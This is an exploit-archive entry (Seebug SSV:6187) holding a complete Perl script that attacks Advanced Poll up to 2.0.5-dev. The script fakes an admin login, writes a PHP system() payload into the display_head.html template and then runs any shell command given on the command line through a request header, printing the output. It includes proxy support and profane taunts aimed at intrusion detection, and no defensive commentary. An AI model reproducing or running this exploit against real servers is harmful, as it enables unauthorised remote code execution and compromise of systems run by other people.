Advanced Poll <= 2.0.5-dev Remote Code Execution Exploit

2007-02-14T00:00:00
ID SSV:6187
Type seebug
Reporter Root
Modified 2007-02-14T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile RCE.
#
# date: 30/07/06
# 
# diwou <diwou@phucksys.org>
#
# PHCKSEC (c) 2001-2006.
#
# Hey, what a mad world!
#

use strict;
use warnings;
use LWP::UserAgent;
use MD5;

#
# args: http://url/apoll_path cmd
#
# proxy: export PROXY=\'http|https://www.my.big.and.famous.proxy:8080/\'
# url: http|https://tatget:(port)/phppoll/
#

die(\"RTFC! ;)\") unless(@ARGV>1);

my ($lwp,$agent,$out,$res,$url,$cmd)=(undef,undef,undef,undef,$ARGV[0],$ARGV[1]);

my %ipost=
(
	poll_tplset => \'default\',
	\'tpl[display_head.html]\' =>
<<HEAD
\\\".system(getenv(HTTP_PHP)).exit().\\\"
<table width=\"$pollvars[table_width]\" border=\"0\" cellspacing=\"0\" cellpadding=\"1\" bgcolor=\"$pollvars[bgcolor_fr]\">
  <tr align=\"center\">
    <td><style type=\"text/css\">
       <!--
        .input { font-family: $pollvars[font_face]; font-size: 8pt}
        .links { font-family: $pollvars[font_face]; font-size: 7.5pt; color: $pollvars[font_color]}
       -->
      </style><font face=\"$pollvars[font_face]\" size=\"-1\" color=\"#FFFFFF\"><b>$pollvars[title]</b></font></td>
  </tr>
  <tr align=\"center\">
    <td>
      <table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"2\" align=\"center\" bgcolor=\"$pollvars[bgcolor_tab]\">
        <tr>
          <td height=\"40\" valign=\"middle\"><font face=\"$pollvars[font_face]\" color=\"$pollvars[font_color]\" size=\"1\"><b>$question</b></font></td>
        </tr>
        <tr align=\"right\" valign=\"top\">
          <td>
            <form method=\"post\" action=\"$this->form_forward\">
            <table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">
              <tr valign=\"top\" align=\"center\">
                <td>
                  <table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"1\" align=\"center\">
HEAD
,
	action   =>  \'\',
	tplset   =>  \'default\',
	tpl_type =>  \'display\',
	session  =>  \'\',
	uid      =>  1
);

my %epost=
(
	session    => \'\',
	uid        => 1,
	poll_tplst => \'default\',
	tpl_type   => \'display\',
);

my %zday=
(
	username => \'jakahw4nk4h\',
	\'pollvars[poll_username]\' => \'jakahw4nk4h\',
	password => \'fuckoff\',
	\'pollvars[poll_password]\' => \'\'
);

$zday{\'pollvars[poll_password]\'}=&md5($zday{password});
$agent=\"Hey IDS! i\'m gonna fuck your advanced poll right? B===D\"; # post method doesnt log it, so doesnt matter.
#$agent=\"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1\";

$lwp=new LWP::UserAgent();
$lwp->agent($agent);
$lwp->timeout(10);
$lwp->protocols_allowed([\'http\',\'https\']);

if($ENV{PROXY})
{
	$lwp->proxy([\'http\',\'https\'],$ENV{PROXY});
	print \"Using proxy \".$ENV{PROXY}.\"
\";
}

$url.=\"/\" if($url!~//$/);
$url.=\"admin/index.php\";
print \"Doing some pretty with \".$url.\"...

\";

print \"+ generating session...
\";
$out=$lwp->post($url,\\%zday)->content();
if($out=~ /index.php?session=((.){32})/)
{
	$ipost{\'session\'}=$epost{\'session\'}=$1;
	print \"  session: \".$ipost{\'session\'}.\"
\";
	
	$url=~s/index.php/admin_templates.php/g;
	print \"+ injecting diplay_head.html template...
\";
	$out=$lwp->post($url,\\%ipost)->content();
	$epost{\'action\'}=$1 if($out=~ /<input type=\"submit\" name=\"action\" value=\"(.*)\" class=\"button\">/);
	print \"  button: \".$epost{\'action\'}.\"
\";

	$url=~s/admin_templates.php/admin_preview.php/g;
	print \"+ executing...
\";
	$out=$lwp->post($url,\\%epost,PHP => \"echo BOCE;\".$cmd.\";echo EOCE\")->content();

	print \"-- BOCE --
\";
	foreach $out (split(/
/,$out))
	{
		$res=1,next if($out=~/BOCE/);
		$res=0,next if($out=~/EOCE/);
		print $out.\"
\" if($res);
	}
	print \"-- EOCE --
\";
}
else
{
	print \"don\'t worry, u can improve me! eh eh eh :D?
\";
}

sub md5
{
	$_=new MD5;
	$_->add(@_);
	return unpack(\"H*\",$_->digest());
}